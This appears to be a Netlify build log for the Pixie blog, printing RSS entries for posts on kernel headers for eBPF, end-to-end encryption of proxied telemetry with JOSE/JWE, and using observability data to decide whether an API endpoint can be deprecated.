that the host system already has Linux headers installed. If you are running your eBPF application in a container, you’ll have to mount the headers into your container so your eBPF program can access it, but other than that life is good.</p><p>If the headers aren’t available, then we have to look for alternatives. If your users can be prodded to install the headers on the host by running something like <code>sudo apt install linux-headers-$(uname -r)</code>, that should be your next option.</p><p>If it’s not practical to ask your users to install the headers, there’s still a few other approaches you can try. If the host kernel was built with <a href="https://cateee.net/lkddb/web-lkddb/IKHEADERS.html">CONFIG_IKHEADERS</a>, then you can also find the headers at <code>/sys/kernel/kheaders.tar.xz</code>. Sometimes this is included as a kernel module that you’ll have to load. But once it’s there, you can essentially get the headers for building your eBPF code.</p><p>If none of the above works for you, then all hope is not lost, but you’re entering wary territory. It turns out '... 4861 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Adding End-to-End Encryption for Proxied Data',

5:35:42 PM: date: '2021-09-21',

5:35:42 PM: description: 'End-to-end encryption has become increasingly popular as users demand that any data they send - a file, email, or text message - is not…',

5:35:42 PM: url: 'https://blog.px.dev/e2e-encryption/',

5:35:42 PM: guid: 'https://blog.px.dev/e2e-encryption/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>End-to-end encryption has become increasingly popular as users demand that any data they send - a file, email, or text message - is not decipherable by any unauthorized recipients. This consumer trend is evident in the recent surge in popularity of Signal, an encrypted instant messaging service.</p><p>In this post, we’ll cover what end-to-end encryption is and walk you through how we implemented it in our system.</p><h2>Why End-to-End Encryption?</h2><p>Pixie is designed with a <a href="/hybrid-architecture/hybrid-architecture/">hybrid cloud architecture</a> where data is collected and stored on the customer's environment. The cloud component is used for user management, authentication and proxying data.</p><div class="image-xl"><svg title="This is a simplified architecture diagram of our system before end-to-end encryption." src="before-e2e.svg"></svg></div><p>We use standard security practices to secure data in transit; all network communication between the cluster, proxy and client is TLS encrypted.</p><p>But TLS encryption is only point-to-point. When data passes internally through our proxy, the data is temporarily unencrypted. Pixie is an open source project, so users might deploy Pixie Cloud (and the accompanying proxy) in a variety of environments. We wanted to provide privacy guarantees for users given the heterogeneity of deployment scenarios.</p><p>By adding end-to-end encryption, we can ensure that the proxy only sees an encrypted form of the telemetry data.</p><h2>Implementation</h2><p>Pixie provides multiple clients for developers to interact with its platform:</p><ul><li>a web UI (JavaScript)</li><li>a CLI (Golang)</li><li>APIs (client libraries: Golang, Python)</li></ul><p>Since we needed to support E2E encryption across multiple languages, using a crypto standard with readily available implementations in multiple languages was a must. Given that we already use <a href="https://datatracker.ietf.org/doc/html/rfc7519/">JSON Web Token</a> (JWT) for user claims, we chose to look at the IETF proposed <a href="https://datatracker.ietf.org/group/jose/documents/">JSON Object Signing and Encryption</a> (JOSE) standard for our E2E encryption needs. We settled on using <a href="https://datatracker.ietf.org/doc/html/rfc7517/">JSON Web Key</a> (JWK) for key exchange and <a href="https://datatracker.ietf.org/doc/html/rfc7516/">JSON Web Encryption</a> (JWE) as our encryption format.</p><p>There are multiple libraries that implement the JOSE spec in different languages. We chose the following:</p><ul><li><a href="https://www.npmjs.com/package/jose">jose</a> for JavaScript (imported as <a href="https://www.npmjs.com/package/@inrupt/jose-legacy-modules">@inrupt/jose-legacy-modules</a> for compatibility with our tooling)</li><li><a href="https://pkg.go.dev/github.com/lestrrat-go/jwx">lestrrat-go/jwx</a> for Golang</li><li><a href="https://pypi.org/project/Authlib/">Authlib</a> for Python (notably, this library successfully handles messages that include null bytes)</li></ul><p>All three libraries have active communities, are well designed, have thoroughly documented APIs, and contain extensive test suites.</p><h2>End-to-End Encryption in Pixie</h2><p>JWE supports a variety of key types and algorithms, however <a href="https://datatracker.ietf.org/doc/html/rfc3447#section-7.1">RSA-OAEP</a> seems to be the most widely supported one across the many libraries. So we chose to use 4096 bit RSA keys with the RSA-OAEP encryption scheme across all our clients.</p><div class="image-xl"><svg title="This is how a client interacts with Pixie after enabling end-to-end encryption." src="after-e2e.svg"></svg></div><p>The client generates an asymmetric keypair and sends the public key with any requests for data. Telemetry data is encrypted with the given public key on the cluster. It remains encrypted from the moment it leaves the cluster until it reaches the client.</p><p>The asymmetric keypairs are intentionally ephemeral and generated at client creation time and rotated across sessions. This lack of reuse of keys allows an additional layer of protection from any accidentally leaked private keys.</p><p>We encrypt all telemetry data. Other message fields currently remain unencrypted within the proxy and are used by the proxy to make routing decisions.</p><h2>Summary</h2><p>Once we identified the various client libraries we wanted to use, implementing E2E encryption was straightforward. Check out the commits below for implementation details:</p><ul><li><a href="https://github.com/pixie-io/pixie/commit/d36d56b2e549038a59625525d20c5510f1e79ddf">commit #1</a>: Add encryption support to the <strong>Golang Server</strong></li><li><a href="https://github.com/pixie-io/pixie/commit/86237e511154e46d644086276fb103038d8d96e0">commit #2</a>: Add key creation & decryption support to the <strong>JavaScript UI</strong></li><li><a href="https://github.com/pixie-io/pixie/commit/079ad7d482d89e7349c930466721a00a70f01d1d">commit #3</a>: Add key creation & decryption support to the <strong>Golang API</strong></li><li><a href="https://github.com/pixie-io/pixie/commit/0d8e5c5220215bd7d88c83347284ff94ec27d2dc">commit #4</a>: Add key creation & decryption support to the <strong>Python API</strong></li></ul><p>We hope that the JOSE proposal becomes an IETF standard and this set of libraries and commits acts as a reference for anyone looking to implement E2E encryption in their own project!</p><p>Questions? Find us on <a href="https://slackin.px.dev/">Slack</a> or Twitter at <a href="https://twitter.com/pixie_run">@pixie_run</a>.</p>'

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Can I deprecate this endpoint?',

5:35:42 PM: date: '2022-01-11',

5:35:42 PM: description: 'Nothing lasts forever, including even the best designed APIs. Let’s imagine you are a developer who has taken over ownership of a Catalog…',

5:35:42 PM: url: 'https://blog.px.dev/endpoint-deprecation/',

5:35:42 PM: guid: 'https://blog.px.dev/endpoint-deprecation/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>Nothing lasts forever, including even the best designed APIs.</p><p>Let’s imagine you are a developer who has taken over ownership of a Catalog microservice. You’ve been asked to deprecate the <code>/v1/catalog</code> endpoint in favor of the new <code>/v2/catalog</code> endpoint. How do you go about this?</p><p>Whatever the reason for removal – a new version or a planned end-of-life – the first step in a <em>graceful</em> API deprecation is to observe:</p><ul><li>Is this endpoint used?</li><li>If so, who is calling it?</li></ul><h2>Is this endpoint used?</h2><p>Before you can deprecate the endpoint, you need to first check if the endpoint is actually being used.</p><h3>Search the codebase</h3><p>For internal endpoints, a great way to start is to search the codebase for calls to the API. However, once you believe all calls have been removed, you will still want to use observability tooling to verify that all usage of the API has indeed stopped. It's possible that you may still be getting traffic from an older version of a service that is still running.</p><p>Note that after you remove all API calls from the codebase, company protocol may dictate that you wait several releases before turning off the endpoint. Most established companies have standards for backwards compatibility of their microservice APIs (even internal ones). For example, a company might have a policy requiring 3 releases to pass between deprecation of an API and removal, in the event that there’s a rollback.</p><h3>Verify with observability tooling</h3><p>Your company’s specific method for determining endpoint usage may vary. Some applications export metrics that they explicitly define on their services (e.g. Prometheus). Some applications are set up to log every inbound HTTP request (e.g. Apache logging).</p><p>Another option is to use <a href="https://github.com/pixie-io/pixie">Pixie</a>, an open source observability tool for Kubernetes applications. Pixie automatically traces request traffic of <a href="https://docs.px.dev/about-pixie/data-sources/">numerous protocols</a> (HTTP, MySQL, gRPC, and more) <a href="https://docs.px.dev/about-pixie/pixie-ebpf/">using eBPF</a>. But no matter how you gather the data, you’ll need to answer the same questions.</p><p>Let’s check for HTTP traffic to the <code>/v1/catalog</code> endpoint to see if there are any clients of this endpoint.</p><div class="image-xl"><svg title="Output of a PxL script showing all HTTP/2 traffic sent to a specific service." src="service-traffic.png"></svg></div><h3>Endpoints with wildcards?</h3><p>Now you have an answer: the <code>/v1/catalog</code> endpoint <em>is</em> actually being used.</p><p>Taking a look at the different request paths, you can see that the endpoint contains a wildcard parameter. In this case, it appears we have a <code>/v1/catalog/{uuid}/details</code> endpoint that takes an <code>uuid</code> query parameter that will change depending on the product the API client would like to get details about.</p><p>Clustering by logical endpoint provies a better high-level view of the usage of the API.</p><p>For example, these two calls:</p><pre><code class="language-bash">/v1/catalog/d3588631-ad8e-49df-bbd6-3167f7efb291/details\n' +

5:35:42 PM: '/v1/catalog/d3234332-s5fe-s30s-gsh6-323434sdf634/details\n' +

5:35:42 PM: '</code></pre><p>Should be clustered together into the logical endpoint:</p><pre><code>/v1/catalog/*/details\n' +

5:35:42 PM: '</code></pre><p>Let’s cluster the requests to the Catalog service by logical endpoint. Pixie takes a statistical approach to this, but you can also try to manually build patterns with regexes.</p><div class="image-xl"><svg title="Output of PxL script showing all endpoints for a specific service, with high-level latency, error and throughput statistics." src="service-endpoint-summary.png"></svg></div><p>This high-level view of the Catalog service traffic confirms that there are two versions of the <code>/catalog</code> endpoint receiving traffic and that only the <code>/v1</code> version has the <code>/details</code> endpoint.</p><h2>Who us

5:35:42 PM: (build.command completed in 50.7s)

5:35:42 PM: Skipping Gatsby Functions and SSR/DSG support

5:35:46 PM: Skipping Gatsby Functions and SSR/DSG support

5:35:46 PM:

5:36:05 PM: (Netlify Build completed in 1m 18.7s)

5:36:05 PM: Section completed: building

5:36:26 PM: Finished processing build request in 2m14.42s

Deploy successful for blog-px-dev

Lighthouse scores

Deploy summary

Initializing

Building

Deploying

Cleanup

Post-processing